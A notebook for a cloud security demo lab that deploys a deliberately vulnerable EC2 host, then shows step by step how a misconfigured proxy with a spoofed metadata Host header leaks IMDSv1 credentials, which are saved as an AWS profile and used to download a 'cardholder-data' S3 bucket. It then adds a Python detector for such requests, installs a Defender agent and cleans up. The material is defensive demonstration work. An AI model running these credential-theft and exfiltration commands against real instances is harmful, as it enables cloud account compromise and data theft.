# __Attack__: Stealing confidential data from S3 via Misconfigured Proxy Server.

## __Summary__: The Defender is essential to prevent attacks.

__Without the Defender__ credentials are compromised via the Metadata V1 (IMDSv1) service + a misconfigured proxy.  
__With the Defender__ credentials are not compromised, even with the Metadata V1 (IMDSv1) service + a misconfigured proxy.  
Most CSPM tools will only detect the misconfiguration.  

__The Defender will prevent attackers from exploiting misconfigurations.__  

__Overview__  
Starting as an anonymous outsider with no access or privileges, exploit a misconfigured reverse-proxy server to query the EC2 metadata V1 service and acquire instance profile keys. Then use those keys to discover, access, and exfiltrate sensitive data from an S3 bucket.  
  
Normally, CSPM will detect that the Metadata V1 service is enabled, but it cannot prevent such attacks in real time. 

![image.png](attachment:47825de6-dfb5-4dc0-b39b-7d84f47c84a5.png)

### __LAB SETUP__ (Complete BEFORE screen sharing begins) 

In [None]:
aws sso login

In [None]:
eval "$(aws configure export-credentials --profile default --format env)"

In [None]:
cd /Users/leichenbaum/Documents/git_repos/demo/attack_lab_script/aws

unamestr=$(uname)

# get the public IP of this workstation; it is the only address allowed to reach the lab server
IP=$(curl -s https://ipinfo.io/ip)

# random suffix that keeps the lab resource names unique (md5 on macOS, md5sum elsewhere)
if [[ $unamestr == 'Darwin' ]]; then
    RANDOM_STRING=$(echo $RANDOM | md5 | head -c 20)
else
    RANDOM_STRING=$(echo $RANDOM | md5sum | head -c 20)
fi

# abort if a previous run left its terraform directory behind, otherwise create the temp directory
[ -d $(pwd)/temp-lab/cloud_s3_breach-lab-server/terraform ] && { echo "Directory already exists" && exit; }
mkdir -p $(pwd)/temp-lab/cloud_s3_breach-lab-server

cp -r $(pwd)/cloud_s3_breach/terraform temp-lab/cloud_s3_breach-lab-server/
cp -r $(pwd)/cloud_s3_breach/assets temp-lab/cloud_s3_breach-lab-server/
cd $(pwd)/temp-lab/cloud_s3_breach-lab-server/terraform
# generate the SSH key pair for the lab EC2 instance, install the terraform modules and deploy the lab
ssh-keygen -b 4096 -t rsa -f ./panw -q -N ""
terraform init
terraform apply -var cgid=$RANDOM_STRING -var cg_whitelist=$IP/32 --auto-approve

In [None]:
export panw_output_aws_account_id=$(terraform output -raw panw_output_aws_account_id | sed 's/\s*=\s*/=/g' )
export panw_output_target_ec2_server_ip=$(terraform output -raw panw_output_target_ec2_server_ip | sed 's/\s*=\s*/=/g' )

# __Attack__: Demonstrate the Attack Steps

__Run curl against the output IP and notice the error "This server is configured to proxy requests to the EC2 metadata service. Please modify your request's 'host' header and try again."__  

In [None]:
curl $panw_output_target_ec2_server_ip

__Get the IAM user by running the command below__  

In [None]:
curl -s http://${panw_output_target_ec2_server_ip}/latest/meta-data/iam/security-credentials/ -H 'Host:169.254.169.254'

Set the value to a variable for ease of use.

In [None]:
targetRole=$(curl -s http://${panw_output_target_ec2_server_ip}/latest/meta-data/iam/security-credentials/ -H 'Host:169.254.169.254')

__Get the IAM user credentials by running the command below__  

In [None]:
curl -s http://${panw_output_target_ec2_server_ip}/latest/meta-data/iam/security-credentials/${targetRole} -H 'Host:169.254.169.254'

Set the values to variables for ease of use.

In [None]:
# fetch the credential document once, then pick the three fields out of it with jq
creds=$(curl -s http://${panw_output_target_ec2_server_ip}/latest/meta-data/iam/security-credentials/${targetRole} -H 'Host:169.254.169.254')
target_aws_access_key_id=$(echo "$creds" | jq -r '.AccessKeyId')
target_aws_secret_access_key=$(echo "$creds" | jq -r '.SecretAccessKey')
target_aws_session_token=$(echo "$creds" | jq -r '.Token')

In [None]:
# drop any [erratic] profile left by a previous run (GNU sed range syntax), then append the captured temporary credentials
sed -i -e '/erratic/,+3d' ~/.aws/credentials
echo "[erratic]" >> ~/.aws/credentials
echo "aws_access_key_id=${target_aws_access_key_id}" >> ~/.aws/credentials
echo "aws_secret_access_key=${target_aws_secret_access_key}" >> ~/.aws/credentials
echo "aws_session_token=${target_aws_session_token}" >> ~/.aws/credentials

__List all S3 buckets available to the IAM user by running the command below__ 

In [None]:
aws s3 ls --profile erratic | awk '{print $3}'

In [None]:
targetBucket=$(aws s3 ls --profile erratic | awk '{print $3}')

__Download the confidential data from the S3 bucket using the command below__ 

In [None]:
aws s3 sync s3://$targetBucket ./cardholder-data --profile erratic

__View Target Data__  

In [None]:
head ./cardholder-data/cardholder_data_primary.csv

# __Defense__: How to prevent the attack with the WAAS Agent:  
WAAS protects against theft of the access key and token through the metadata exploit: it detects the proxied metadata request and blocks it through runtime prevention. 
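The two defender-side checks implied by the Overview and by this section, as an added example that is not part of the lab: flag proxy access-log lines that carry the metadata-service Host header (the request pattern the attack steps send), and report whether an instance's metadata options still allow unauthenticated IMDSv1 requests. The log format (nginx-style with the Host header as the last field) and the sample lines are constructed assumptions; the `MetadataOptions` dictionary has the shape returned by `aws ec2 describe-instances`.

```python
import re
from typing import List, Optional, Tuple

IMDS_HOST = "169.254.169.254"
CRED_PATH = "/latest/meta-data/iam/security-credentials"

# Assumed access-log format: client, ident, user, [time], "METHOD PATH PROTO", status, bytes, "Host header".
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \d+ "(?P<host>[^"]*)"$'
)

# Constructed sample: a normal request, the two credential lookups from the attack steps, and a
# generic metadata lookup from another client.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "app.example.com"',
    '203.0.113.7 - - [10/Jan/2024:10:00:05 +0000] "GET /latest/meta-data/iam/security-credentials/ HTTP/1.1" 200 18 "169.254.169.254"',
    '203.0.113.7 - - [10/Jan/2024:10:00:09 +0000] "GET /latest/meta-data/iam/security-credentials/lab-role HTTP/1.1" 200 1240 "169.254.169.254"',
    '198.51.100.2 - - [10/Jan/2024:10:01:00 +0000] "GET /latest/meta-data/instance-id HTTP/1.1" 200 19 "169.254.169.254"',
]


def classify(line: str) -> Optional[Tuple[str, str, str]]:
    """Return (severity, client, path) when a log line reached the metadata service through the proxy, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host, path = m.group("host"), m.group("path")
    # A proxy that rewrites Host to 169.254.169.254, or forwards /latest/... paths, is the misconfiguration.
    if host != IMDS_HOST and not path.startswith("/latest/"):
        return None
    severity = "critical" if path.startswith(CRED_PATH) else "suspicious"
    return (severity, m.group("client"), path)


def flag_proxy_log(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Run classify() over every line and keep only the hits, in log order."""
    return [hit for hit in map(classify, lines) if hit is not None]


def imdsv1_reachable(metadata_options: dict) -> bool:
    """True when the instance still answers IMDSv1 (no session token required) on an enabled endpoint."""
    endpoint_on = metadata_options.get("HttpEndpoint", "enabled") == "enabled"
    tokens_optional = metadata_options.get("HttpTokens", "optional") != "required"
    return endpoint_on and tokens_optional


if __name__ == "__main__":
    for severity, client, path in flag_proxy_log(SAMPLE_LOG):
        print(f"{severity:10} {client:15} {path}")
    print("IMDSv1 reachable:", imdsv1_reachable({"HttpEndpoint": "enabled", "HttpTokens": "optional"}))
```

Instances for which `imdsv1_reachable()` returns True can be hardened with `aws ec2 modify-instance-metadata-options --instance-id <id> --http-tokens required`, which closes the IMDSv1 path independently of the proxy fix.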

![image.png](attachment:ccfc7610-bfb8-40e8-9bc9-7917df1fa670.png)

__Go to Manage > Defenders > Defenders: Deployed > Manual deploy__ 

![image.png](attachment:80ef8517-1ff2-4c8b-a6ad-98325c9b0233.png)

__SSH into the vulnerable EC2 instance and install the Defender__ (replace the command below with the one from the Commercial East tenant)

In [None]:
installCmd='curl -sSL --header "authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.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.7gOY8ghu1-OPG_N_WViMwGuTd5a1DAdFf6oAAyc1d0Y" -X POST https://us-west1.cloud.twistlock.com/us-4-161058131/api/v1/scripts/defender.sh | sudo bash -s -- -c "us-west1.cloud.twistlock.com" -v --install-host'

In [None]:
ssh -o StrictHostKeyChecking=accept-new -i /Users/leichenbaum/Documents/git_repos/demo/attack_lab_script/aws/temp-lab/cloud_s3_breach-lab-server/terraform/panw ubuntu@$panw_output_target_ec2_server_ip $installCmd

__Go to Defend > WAAS > Host > Add Rule and click on Add new app__

![image.png](attachment:e9b4a5cb-151f-496f-8c07-bfed22cb636a.png)

__Attempt to curl the access key & token after the rule is set to Alert, then again after it is set to Prevent__  

In [None]:
curl http://${panw_output_target_ec2_server_ip}/latest/meta-data/iam/security-credentials/${targetRole} -H 'Host:169.254.169.254' > ./${panw_output_target_ec2_server_ip}-OUT.html && open ./${panw_output_target_ec2_server_ip}-OUT.html

### __CLEANUP__

Set the WAAS rule back to Alert.

In [None]:
echo $RANDOM_STRING
echo $IP

In [None]:
cd /Users/leichenbaum/Documents/git_repos/demo/attack_lab_script/aws
cd $(pwd)/temp-lab/cloud_s3_breach-lab-server/terraform
terraform destroy -var cgid=$RANDOM_STRING -var cg_whitelist=$IP/32 --auto-approve
#AWS_ACCESS_KEY_ID=$waasdemo_aws_access_key_id AWS_SECRET_ACCESS_KEY=$waasdemo_aws_secret_access_key AWS_SESSION_TOKEN=$waasdemo_aws_session_token terraform destroy -var cgid=$RANDOM_STRING -var cg_whitelist=$IP/32 --auto-approve
cd /Users/leichenbaum/Documents/git_repos/demo/attack_lab_script/aws
rm -r ./temp-lab

Clean up the AWS credentials file.

In [None]:
sed -i -e '/erratic/,+3d' ~/.aws/credentials

In [None]:
cat ~/.aws/credentials